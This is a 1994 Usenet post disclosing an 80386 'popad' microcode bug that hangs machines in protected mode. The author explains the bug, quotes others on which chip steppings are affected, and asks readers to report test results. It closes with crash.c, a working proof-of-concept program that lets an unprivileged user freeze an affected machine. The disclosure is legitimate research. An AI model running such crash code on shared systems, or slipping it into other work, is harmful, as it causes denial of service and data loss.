*BSD News Article 27831


Path: sserve!newshost.anu.edu.au!munnari.oz.au!news.Hawaii.Edu!ames!elroy.jpl.nasa.gov!usc!howland.reston.ans.net!agate!msuinfo!harbinger.cc.monash.edu.au!jacobi.maths.monash.edu.au!billm
From: billm@jacobi.maths.monash.edu.au (WE Metzenthen)
Newsgroups: comp.os.386bsd.development
Subject: Serious 80386 bug
Date: 24 Feb 1994 04:11:30 GMT
Organization: Monash University
Lines: 133
Message-ID: <2kh9di$igb@harbinger.cc.monash.edu.au>
NNTP-Posting-Host: jacobi.maths.monash.edu.au
X-Newsreader: TIN [version 1.2 PL2]

[ Article crossposted from comp.os.linux.development ]
[ Author was WE Metzenthen ]
[ Posted on 24 Feb 1994 04:06:12 GMT ]


      Running 'crashme' on my Linux system for a few hours caused my
machine to hang. After a few hours of investigation I found the
cause. It is due to a serious bug in the microcode of some 80386's.

      In about July 1989 there was some discussion on the net about
the "popad bug" in 80386 processors. It appeared to affect all 80386's
(dx or sx, Intel or AMD) but no 80486 was found which had the bug. The
bug appeared to be benign in so far as its only bad effect seemed to
be to put incorrect contents into the eax register, and there was an
easy work-around. All of the discussion at that stage seemed to be
concerned with tests done in real mode.

      From my experiments, the effects of the bug in protected mode
appear to be far more serious. It causes my machine to hang. I have
not yet been able to discover if the processor is still executing
instructions after encountering the offending code.

      I have attached the code which triggers the bug to the end of
this posting. BE AWARE THAT THIS CODE CAN RESULT IN DATA LOSS. It is
probably safest to put the code onto ram disk and run it without
any physical disks mounted. I have run it a number of times with
disks mounted and e2fsck has always been able to do the minor fix-up
when I rebooted.

      At this stage I know of no way to overcome this bug. Unless some
magic is found, it appears impossible for the operating system to
guard against it. Fortunately, it appears that the probability of
accidentally triggering the bug is very low. However, any 80386 machine
which has this bug should not allow public access where users can run
their own code.

      In response to a related posting yesterday to a hardware group,
one user reports that the popad bug exists on an 80386-40, another
reports an 80386sx which doesn't have it. Art Boyne
<boyne@lvld.hp.com> writes that later versions of the 80386 have the
popad bug fixed:

> Yes.  It is fixed in (at least) the double-sigma step, which I believe
> is still the current 386 stepping.  These chips are identified by two
> sigma signs on the package.
       
      It would be helpful if owners of 80386 machines who, AFTER TAKING
SUITABLE PRECAUTIONS, run the program at the end of this posting would
mail the results to me, including the age of the 80386 (or post them to
comp.os.linux.development). Thanks.

      (My machine uses a 33MHz AMD 80386. The motherboard was
manufactured in Jan 1992.)


--Bill


--------------------------- start of crash.c ------------------------------
/*
   crash.c

   A small program to crash 80386 machines.

   *****************************  NOTE  ****************************
   DO NOT RUN THIS PROGRAM UNLESS YOU ARE WILLING TO ACCEPT POSSIBLE
   DATA LOSS!

   W. Metzenthen  23rd Feb 1994.
   <billm@jacobi.maths.monash.edu.au>

   This code relies upon a defect in the 80386 microcode, i.e. the
   so-called "popad bug".
   A few experiments have been tried. Three components appear to be needed:
   1) an operand-size prefix byte,
   2) a 'popa' instruction, and
   3) a critical instruction immediately after the popa. This may
      be 'xchgb %al,(%eax)' or similar.
   This code cannot be debugged with gdb, etc; the bug will go away
   if an attempt is made to single-step it.

   None of the following instructions are suitable for use as 3) above
   (they won't crash the machine):
     nop
     movl _x,%eax
     xchgb  %al,%ah
     xchgb  %al,_x
     xchgb  %al,(0)
   but this is:
     xchgb  %al,0xfffffff6(%eax,8)
 */
#include <stdlib.h>  /* for exit() */

int main(void)
{
  /* Put a valid address into eax (not actually needed). */
  asm volatile ("movl %esp,%eax");

  /* This is the code which does the damage: */
  asm volatile (
    ".byte 0x66\n\t"          /* operand-size prefix */
    "popa\n\t"
    "xchgb  %al,(%eax)\n\t"   /* the critical instruction after the popa */
    );

#define TRY_RECOVERY
#ifdef TRY_RECOVERY
  /* Possible recovery if the processor has been put into real mode
     (but doesn't work on my machine).
     If in real mode, a far jump to f000:fff0 should cause a re-boot: */
  asm volatile (
    "nop; nop; nop; nop; nop; nop\n\t"
    ".byte 0xea, 0xf0, 0xff, 0x00, 0xf0\n\t"
    );
#endif /* TRY_RECOVERY */

  exit(0); /* Just in case the above code doesn't crash the machine */
}
---------------------------- end of crash.c -------------------------------


--
Bill Metzenthen
Mathematics Department
Monash University
Clayton, Victoria, Australia
email: billm@vaxc.cc.monash.edu.au
       billm@euler.maths.monash.edu.au
